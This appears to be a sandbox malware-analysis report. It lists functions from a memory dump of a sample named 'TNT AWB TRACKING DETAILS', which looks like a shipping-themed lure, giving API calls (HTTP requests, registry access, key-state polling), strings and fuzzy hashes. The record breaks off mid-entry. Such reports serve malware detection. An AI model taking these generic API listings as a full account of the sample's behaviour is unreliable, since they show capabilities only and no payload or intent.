Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 04f5d0d2295aab29fff53bc7c26552dcd236f00d6743975dc7d1a1abcb198a16
Instruction ID: 3db74711af619fdcdb459d7b879736349e28ce28ed21cfd34c15e504c335f0c9
Opcode Fuzzy Hash: 04f5d0d2295aab29fff53bc7c26552dcd236f00d6743975dc7d1a1abcb198a16
Instruction Fuzzy Hash: 9E51CD716083019EE7349F28C889A6FBBE8EF59354F140AADF895D32D1DB70CC488B52

Function 00AFD56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AFD5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00AFD60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00AFD61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AFD69D

Strings

DllGetClassObject, xrefs: 00AFD610

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 73d817e5232f17b762ac89e8f9093e8ba972add2552b969952294a3096cf560a
Instruction ID: 1504848607f3076d520da9df341babcb4cb840aeb95bcfaa8d53280308cb33fb
Opcode Fuzzy Hash: 73d817e5232f17b762ac89e8f9093e8ba972add2552b969952294a3096cf560a
Instruction Fuzzy Hash: D641A5B1610208EFDB16DF94C884AAA7BBAEF44310F1581A9FE09DF205D7B1DD44DBA0

Function 00B02753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B027C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B027DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00B02822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B65890,00000000), ref: 00B0286B

Strings

0, xrefs: 00B027B5

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: cd1fb6feac5cd5ac7975a934814f9e54963af26e8d6af386900794773231ac45
Instruction ID: 4e7ea27fed880ba8a749eac711f25816fa5a1dc57a8a5b2a27f49fe6da19296c
Opcode Fuzzy Hash: cd1fb6feac5cd5ac7975a934814f9e54963af26e8d6af386900794773231ac45
Instruction Fuzzy Hash: 03418E752043419FD724DF24C889B2ABFE8EF85314F148AADF9A5972D1DB30E909CB52

Function 00B1D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B1D7C5

Part of subcall function 00AA784B: _memmove.LIBCMT ref: 00AA7899

Strings

cdecl, xrefs: 00B1D81C
stdcall, xrefs: 00B1D847
none, xrefs: 00B1D8A0
winapi, xrefs: 00B1D836

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 4c15ee387114b24c054e0896740aa55c531f1b5ab8f3d704ccf646ec39741907
Instruction ID: 611f43c6472b75fe3a7d96c3472a56d293fe7e61b5900380124f1e31cce55db1
Opcode Fuzzy Hash: 4c15ee387114b24c054e0896740aa55c531f1b5ab8f3d704ccf646ec39741907
Instruction Fuzzy Hash: D5317E71904619EBCF00EF68CD51AEEB3F5FF05320B5086A9E835976D1DB71A945CB80

Function 00AF8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

Part of subcall function 00AFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00AFAABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00AF8F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00AF8F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00AF8F57

Part of subcall function 00AA7BCC: _memmove.LIBCMT ref: 00AA7C06

Strings

ComboBox, xrefs: 00AF8E9E
ListBox, xrefs: 00AF8ED3

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: bdae96e4f00c0ff776188a7bbc8b3fd8e4fa9b34d3984c67a27fc7e86c25016b
Instruction ID: 2d4a56b575100ee3282b07770d3c77437120fa84d205072d2384b91c613f324f
Opcode Fuzzy Hash: bdae96e4f00c0ff776188a7bbc8b3fd8e4fa9b34d3984c67a27fc7e86c25016b
Instruction Fuzzy Hash: 3621E171A04108BEDB15ABF0DC85DFFB7B9DF16360B144529F925A72E1DF39480AD620

Function 00B1182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B1184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B11872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B118A2
InternetCloseHandle.WININET(00000000), ref: 00B118E9

Part of subcall function 00B12483: GetLastError.KERNEL32(?,?,00B11817,00000000,00000000,00000001), ref: 00B12498
Part of subcall function 00B12483: SetEvent.KERNEL32(?,?,00B11817,00000000,00000000,00000001), ref: 00B124AD

Strings

, xrefs: 00B11893

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 470d5af5fe43e689f748a5b00599cdd95ad2f553896b4218b183a133ae18f83f
Instruction ID: 8ce422e09982a210e1e749447845c6472df8cd2cacd276c456f86bcba429b9e1
Opcode Fuzzy Hash: 470d5af5fe43e689f748a5b00599cdd95ad2f553896b4218b183a133ae18f83f
Instruction Fuzzy Hash: 08217CB1500208BFEB219F689C85EFF76EDEB48B44F50856AFA05E7240EA209D4597B1

Function 00B263E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AA1D73
Part of subcall function 00AA1D35: GetStockObject.GDI32(00000011), ref: 00AA1D87
Part of subcall function 00AA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA1D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B26461
LoadLibraryW.KERNEL32(?), ref: 00B26468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B2647D
DestroyWindow.USER32(?), ref: 00B26485

Strings

SysAnimate32, xrefs: 00B2643C

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 2a1b94d5e052818574756fd8e601ca524a2c063d80b700e7a58ce59190763bd2
Instruction ID: 12d664080131ff26604c6cbb02255dc16e2035d26260632f39155f4e79094cd2
Opcode Fuzzy Hash: 2a1b94d5e052818574756fd8e601ca524a2c063d80b700e7a58ce59190763bd2
Instruction Fuzzy Hash: 58218E71100225BBEF109F64EC80EBA37E9EB59324F104A69F9A893290D7719C519760

Function 00B06D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00B06DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B06DEF
GetStdHandle.KERNEL32(0000000C), ref: 00B06E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00B06E3B

Strings

nul, xrefs: 00B06E36

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: fc8abc43cbd4d8733ca018e850fef5ae1ac6dac8422d00112dd2e4aee093dc35
Instruction ID: bb3b1f79b2b2cf6d18c5b461da0a65c3dc03007cf824a96bf2efa63196fc485e
Opcode Fuzzy Hash: fc8abc43cbd4d8733ca018e850fef5ae1ac6dac8422d00112dd2e4aee093dc35
Instruction Fuzzy Hash: C721927460030AABDB309F29DC45A9A7FF4EF45720F2046A9FCA0D72D0DB7099618B50

Function 00B06E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00B06E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B06EBB
GetStdHandle.KERNEL32(000000F6), ref: 00B06ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00B06F06

Strings

nul, xrefs: 00B06F01

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 720d6af2376ebfabe4952fc35aacdd53d96dca1afb3e67ac092e01f538446538
Instruction ID: 3f9ea677d536ca8eb307ddc87befc94abd7beec7c649305875349f83c92c5dfb
Opcode Fuzzy Hash: 720d6af2376ebfabe4952fc35aacdd53d96dca1afb3e67ac092e01f538446538
Instruction Fuzzy Hash: 6F2174755003069BDB309F69DC44AAA7BF8EF55720F200AA9FCA1D72D0DB70A861CB60

Function 00B0AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B0AC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B0ACA8
__swprintf.LIBCMT ref: 00B0ACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,00B2F910), ref: 00B0ACFF

Strings

%lu, xrefs: 00B0ACBB

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 5cddfae0c5f7eee0780be0abaefc358d6d54741277b07331f7ac15a78297ff96
Instruction ID: e8c83ecbd1e895c7fe47dceb2d2d0c0b28aae9e5643055e9d8333c0b74b6950b
Opcode Fuzzy Hash: 5cddfae0c5f7eee0780be0abaefc358d6d54741277b07331f7ac15a78297ff96
Instruction Fuzzy Hash: C0214431A00109AFCB10DF65CE45DEF7BF8EF49715B0044A9F909AB251DB71EA41CB61

Function 00B01AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B01B19

Strings

REMOVE, xrefs: 00B01B1F
EXISTS, xrefs: 00B01B41
APPEND, xrefs: 00B01B52
KEYS, xrefs: 00B01B30

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: cff989ec9762affe79d62d63443affe28b4575d85318703c017706d395e63bdf
Instruction ID: a736fd2b72777be630a7da8ccab924b80ae293f2925c36145c9af51579858c68
Opcode Fuzzy Hash: cff989ec9762affe79d62d63443affe28b4575d85318703c017706d395e63bdf
Instruction Fuzzy Hash: 06113C319002098FCF04EFA8D9519AEB7F4FF26308B1048E9D82467291EB32590ACB50

Function 00B1EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B1EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B1EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00B1ED6A
CloseHandle.KERNEL32(?), ref: 00B1EDEB

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: a76a2773e42aaf0f528acb927e3ae667e03872573180d35295272bafab9ea2f2
Instruction ID: 618b1561736578840e2cf27cf5efe0327666b93dc7bd1cc18c27122d798ad9f5
Opcode Fuzzy Hash: a76a2773e42aaf0f528acb927e3ae667e03872573180d35295272bafab9ea2f2
Instruction Fuzzy Hash: 7A816D716043009FD720EF28C986B6BB7E5EF49B10F44886DF9A99B2D2DB74EC418B51

Function 00B20037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

Part of subcall function 00B20E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B1FDAD,?,?), ref: 00B20E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B200FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B2013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B20183
RegCloseKey.ADVAPI32(?,?), ref: 00B201AF
RegCloseKey.ADVAPI32(00000000), ref: 00B201BC

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 6b65bd1dbb8ed5d1629e5e2b7ff93c758d54ed949fbb701f09d6f09be69e15f4
Instruction ID: 682cc979b06577f9301406aabc03cffd24439d79ad5b7e7fb1130656ba5b912b
Opcode Fuzzy Hash: 6b65bd1dbb8ed5d1629e5e2b7ff93c758d54ed949fbb701f09d6f09be69e15f4
Instruction Fuzzy Hash: 46516831218204AFC714EF68DD81E6BB7E9FF84304F40496DF5999B2A2DB31E905CB52

Function 00B1D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B1D927
GetProcAddress.KERNEL32(00000000,?), ref: 00B1D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 00B1D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 00B1DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B1DA21

Part of subcall function 00AA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B07896,?,?,00000000), ref: 00AA5A2C
Part of subcall function 00AA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B07896,?,?,00000000,?,?), ref: 00AA5A50

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 849396cc0074c366dd86d184a704d734180301dfadcd1cda4c46e253dfca7bc6
Instruction ID: ae31a2eb66a746a9856af452ca55887d96a229ef423a5c63b075d74e9981553e
Opcode Fuzzy Hash: 849396cc0074c366dd86d184a704d734180301dfadcd1cda4c46e253dfca7bc6
Instruction Fuzzy Hash: B2511635A00609DFCB00EFA8C5849EEB7F5FF09320B5481A5E955AB352DB31AD85CF91

Function 00B0E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B0E61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00B0E648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B0E687

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B0E6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B0E6B4

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 3362d047d21f0ceb7a7bfeb135be65c20b1d20775154befcb0ba29c233a0f115
Instruction ID: 121a68c72533a13e075bab8ca3457621b2b3ca8734805b7bb682e7dbaeec053c
Opcode Fuzzy Hash: 3362d047d21f0ceb7a7bfeb135be65c20b1d20775154befcb0ba29c233a0f115
Instruction Fuzzy Hash: EE510A35A00105DFCB01EF64D981AAEBBF5EF0A314F1484A9F819AB3A1CB35ED11DB50

Function 00B2A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4775669c3cbd6864d42648d3bd727fcc41ef73031d6acf63103fc6ff63ea1bdc
Instruction ID: e3f8dd4fbfe9881b851929dca00ac8d76621bf5d6d3ef2f1bfeb94c49289402e
Opcode Fuzzy Hash: 4775669c3cbd6864d42648d3bd727fcc41ef73031d6acf63103fc6ff63ea1bdc
Instruction Fuzzy Hash: 6A41EA35904124AFD720DF28EC85FAABBE4EB0A321F1405A5F91DB72E1CB70AD61DA51

Function 00AA2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00AA2357
ScreenToClient.USER32(00B657B0,?), ref: 00AA2374
GetAsyncKeyState.USER32(00000001), ref: 00AA2399
GetAsyncKeyState.USER32(00000002), ref: 00AA23A7

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
